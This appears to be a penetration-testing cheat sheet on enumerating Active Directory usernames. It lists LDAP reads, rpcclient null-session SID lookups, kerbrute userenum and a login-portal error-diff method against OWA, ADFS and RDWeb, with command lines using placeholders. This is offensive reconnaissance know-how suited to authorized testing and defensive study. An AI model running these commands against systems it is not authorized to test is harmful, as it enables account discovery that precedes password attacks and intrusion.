Username Enumeration
- Authenticated: Read LDAP (sAMAccountName/UPN); filter disabled/stale.
- Unauthenticated:
- RID/SAMR null session (if permitted)
rpcclient -U '' -N <host> -c 'lsaquery'rpcclient -U '' -N <host> -c 'lookupsids <domain-sid>-500-55000'
- Brute Force
- Kerberos user-enum:
kerbrute userenum -d <domain> --dc <dc-ip> <userlist>
- Single-attempt portal error-diff (OWA/ADFS/RDWeb/etc.):
- Submit one login per candidate with a known-bad password.
- Compare responses for # “user not found” vs “wrong password”: error text, HTTP status/redirect, content length, or timing.
- If responses are generic or trigger lockout/MFA, stop and skip this method.